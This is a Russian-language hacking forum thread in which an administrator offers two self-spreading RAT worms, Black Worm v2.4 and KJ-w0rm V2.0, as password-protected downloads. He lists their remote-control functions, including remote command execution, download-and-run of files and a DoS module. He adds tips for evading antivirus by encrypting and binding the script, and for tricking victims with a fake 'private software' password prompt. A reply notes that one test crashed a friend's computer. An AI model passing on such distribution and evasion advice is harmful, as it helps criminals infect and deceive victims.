1. ВАЖНО - Статусы (Группы) на форуме, их описание и способы их получения !

    Скрыть объявление

Самораспространяющийся RAT, т.е. червь

Тема в разделе "Компьютерные вирусы", создана пользователем X-Shar, 30 окт 2014.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    6.045
    Симпатии:
    523
    Пол:
    Мужской
    Репа:
    +1.128 / 162 / -33
    Telegram:
    Black Worm v2.4 - довольно интересный софт для удалённого управления. Функций у него не так уж много, по сути это downloader, с его помощью можно закачать и запустить файл с вашего компьютера либо по прямой ссылке, а так же открывать сайты в браузере (полезно для накрутки чего либо). Но главное - это червь (worm), т.е. он умеет само распространяться, по папкам, по USB и даже отправлять спам по контактам skype жертвы! В архиве присутствуют исходники стаба, можно при желании и должных знаниях "почистить" его.

    1414516709_2014-10-28_212433.

    1414516683_2014-10-28_212140.

    Пароль:happy-hack.ru

    Как юзать:

     

    Вложения:

    X-Shar, 30 окт 2014
    #1
    • Мне нравится Мне нравится x 3
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    6.045
    Симпатии:
    523
    Пол:
    Мужской
    Репа:
    +1.128 / 162 / -33
    Telegram:
    KJ-w0rm V2.0: ещё один червь - RAT, схожий по функционалу с Black Worm, плюс в том что имеет меньший вес билда (всего 8 kb), т.к. билд это .vbs скрипт, а так же имеет возможность удалённо передавать команды CMD.

    Червь так же само размножается, я проверил, при запуске он у меня скопировался на флешку. Зашифровать скрипт можно бесплатной утилитой от microsoft Script Encoder а так же конвертировать в .exe файл с добавлением иконки, информации о файле и т.д. с помощью VBS to EXE, в этом случае билд будет весить 25kb (без иконки). Так же с помощью VBS to EXE можно запаролить созданный exe файл дабы он не детектировался антивирусами и "склеить" с любым другим софтом, а "жертве" сказать типо "приват софт, появится окошко с регистрацией, введи этот пароль *****", в общем применяйте фантазию..

    Возможности KJ-w0rm:

    • Удалённо отключить, удалить, перезагрузить червя.
    • Перезагрузить, отключить компьютер, отключить пользователя.
    • Загрузить по прямой ссылке и запустить любой файл.
    • Выполнить удалённо на машине "жертвы" произвольный VBS скрипт.
    • Открыть в браузере веб сайт.
    • Удалённо выполнять команды CMD.
    • Модуль Dos атаки.
    Моё примечание: Можно ещё склееть винраром с полезной нагрузкой: Короче шифруете скрипт + склееваете например с картинкой в самораспаковывающийся архив, тогда 100% неодин АВ даже и не пикнет...Отдыхай!!!

    Пароль:hh
     

    Вложения:

    X-Shar, 31 окт 2014
    #2
    • Мне нравится Мне нравится x 2
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    6.045
    Симпатии:
    523
    Пол:
    Мужской
    Репа:
    +1.128 / 162 / -33
    Telegram:
    X-Shar, 31 окт 2014
    #3
    • Мне нравится Мне нравится x 2
  4. vados203 Пользователь
    vados203
    Ответить в чате

    Первый уровень

    Регистрация:
    08.10.2014
    Сообщения:
    5
    Симпатии:
    1
    Пол:
    Мужской
    Репа:
    +1 / 0 / -0
    Я тестировал Black Worm с другом, у него накрылся компьютер. Такое бывает?
    И может кто-нибудь просветить, что за что отвечает в Buildere?
     
    vados203, 29 ноя 2014
    #4
Похожие темы:
  1. Rafail

    червь Koobface.LP распространяется через прямые сообщения в Твиттер

    Rafail, 2 дек 2012, в разделе: Обзоры новых вирусов
    Ответов:
    4
    Просмотров:
    2.031
    Rafail
    3 дек 2012
  2. X-Shar

    Червь KJ-w0rm V2.0

    X-Shar, 2 фев 2014, в разделе: Компьютерные вирусы
    Ответов:
    1
    Просмотров:
    2.404
    RobinXak
    1 май 2014
Загрузка...

Поделиться этой страницей